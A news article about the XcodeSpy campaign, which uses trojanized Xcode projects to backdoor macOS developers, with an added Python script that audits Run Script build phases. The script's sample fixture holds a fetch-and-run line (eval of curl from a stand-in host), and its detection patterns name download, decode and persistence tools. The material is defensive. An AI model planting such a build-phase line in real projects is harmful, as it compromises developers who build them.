According to researchers, XcodeSpy malware is targeting Xcode developers in a supply-chain attack.
macOS, commonly regarded as secure, has again been infiltrated by malware, this time used by unknown threat actors to target developers who use the Xcode integrated development environment (IDE).
Threat actors have recently started creating malicious versions of popular projects in the hope of luring developers into including them in their applications. When such an application is compiled, the malicious component infects the developer's computer in a supply-chain attack.
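The article does not spell out how a trojanized project runs code at compile time, so as an added example (not part of the original article or of SentinelOne's report) the script below shows the check a developer can run before building an untrusted Xcode project: it parses the project's `project.pbxproj` file, lists every `PBXShellScriptBuildPhase` (the "Run Script" phases Xcode executes during a build) and flags scripts that fetch or evaluate external content. The sample `.pbxproj` fragment, object identifiers and indicator patterns are constructed for the example; the regex parser assumes the usual old-style plist layout Xcode writes and does not attempt to handle every pbxproj variant.

```python
import re
import sys
from typing import Dict, List

# Constructed fragment of an Xcode project.pbxproj with one benign and one
# suspicious Run Script build phase (identifiers AA01..AA03 are made up).
SAMPLE_PBXPROJ = r'''
// !$*UTF8*$!
{
	objects = {
		AA01 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			name = "Run Script";
			shellPath = /bin/sh;
			shellScript = "echo \"Build number: $(date +%s)\"\n";
		};
		AA02 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			name = "Run Script";
			shellPath = /bin/sh;
			shellScript = "eval \"$(curl -fsSL https://example.invalid/x)\"\n";
		};
		AA03 /* Sources */ = {
			isa = PBXSourcesBuildPhase;
			files = (
			);
		};
	};
}
'''

# One pbxproj object: "<hex id> /* comment */ = { ... };". Build phase objects
# contain no nested braces, so a non-greedy match up to the first "};" works.
OBJECT_RE = re.compile(
    r'\b(?P<id>[0-9A-Fa-f]{4,24})\b\s*(?:/\*[^*]*\*/)?\s*=\s*\{(?P<body>.*?)\};',
    re.DOTALL,
)
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')
SHELL_RE = re.compile(r'shellPath\s*=\s*([^;]+);')

# Indicator patterns a reviewer would want highlighted in a build script.
# Constructed for this example; tune to the project's legitimate tooling.
SUSPICIOUS_PATTERNS = {
    "downloads remote content": re.compile(r'\b(curl|wget)\b'),
    "evaluates dynamic code": re.compile(r'\beval\b'),
    "decodes base64": re.compile(r'base64\s+(-d|-D|--decode)'),
    "runs an interpreter one-liner": re.compile(r'\b(python3?|perl|ruby|osascript)\s+-[ce]\b'),
    "launches a background process": re.compile(r'\b(nohup|launchctl)\b'),
    "touches a temp or hidden path": re.compile(r'/tmp/|/private/tmp/|~/\.|\$HOME/\.'),
}


def unescape_pbx_string(raw: str) -> str:
    """Undo pbxproj string escapes (\\n, \\t, \\", \\\\)."""
    return re.sub(r'\\(.)', lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), raw)


def find_shell_script_phases(pbxproj_text: str) -> List[Dict[str, str]]:
    """Return every Run Script build phase with its id, shell and script body."""
    phases = []
    for obj in OBJECT_RE.finditer(pbxproj_text):
        body = obj.group("body")
        if "isa = PBXShellScriptBuildPhase;" not in body:
            continue
        script = SCRIPT_RE.search(body)
        shell = SHELL_RE.search(body)
        phases.append({
            "id": obj.group("id"),
            "shellPath": shell.group(1).strip() if shell else "",
            "shellScript": unescape_pbx_string(script.group(1)) if script else "",
        })
    return phases


def flag_suspicious(script: str) -> List[str]:
    """Return the names of indicator patterns that match the script text."""
    return [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(script)]


def audit(pbxproj_text: str) -> List[Dict[str, object]]:
    """Return one finding per Run Script phase that matches an indicator."""
    findings = []
    for phase in find_shell_script_phases(pbxproj_text):
        reasons = flag_suspicious(phase["shellScript"])
        if reasons:
            findings.append({**phase, "reasons": reasons})
    return findings


if __name__ == "__main__":
    # Usage: python audit_pbxproj.py path/to/Project.xcodeproj/project.pbxproj
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for phase in find_shell_script_phases(text):
        verdict = ", ".join(flag_suspicious(phase["shellScript"])) or "no indicators"
        print(f"[{phase['id']}] {phase['shellPath']}: {verdict}")
        print("    " + phase["shellScript"].strip().replace("\n", "\n    "))
```

The point of listing every Run Script phase, not just the flagged ones, is that a build phase is a legitimate and common Xcode feature; the review question is whether each script belongs to the project, so the auditor prints all of them and lets the indicator names steer attention. Run it against a downloaded project before the first build, since by the time Xcode has compiled the target the script has already executed.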
The malware, named XcodeSpy, was discovered by IT security researchers at SentinelOne on Thursday. It is disguised to deliver a custom variant of a backdoor known as EggShell, which allows its operators to spy on users.
The backdoor also gives the threat actors the ability to upload and download files and to capture data from the victim's camera, microphone, and keyboard.
SentinelOne's report states that the company learned of the malware from an anonymous researcher, but that it had also come across XcodeSpy in late 2020 while targeting an organization in the US.
SentinelOne came across the sample while conducting threat hunting activities, and the victim informed the company that it is regularly targeted by threat actors linked to North Korea.
Cross-referenced evidence shows that the campaign involving XcodeSpy was active at least between July and October 2020. In one case the malware was delivered as a trojanized version of an open-source Xcode project offered to iOS developers.
The company has not yet found any other trojanized Xcode projects but believes that other similar malicious projects could exist.
Additionally, since this is not the first piece of malware created to target Xcode developers, researchers consider it highly likely that another will resurface until the threat actors are brought to light.
Back in 2015, a similar threat named XcodeGhost allowed attackers to inject malicious code into hundreds of legitimate applications that had been built with rogue versions of Xcode downloaded by developers from third-party websites.
XcodeSpy may have been aimed at a specific developer or group, but with such high-value victims other scenarios are also possible.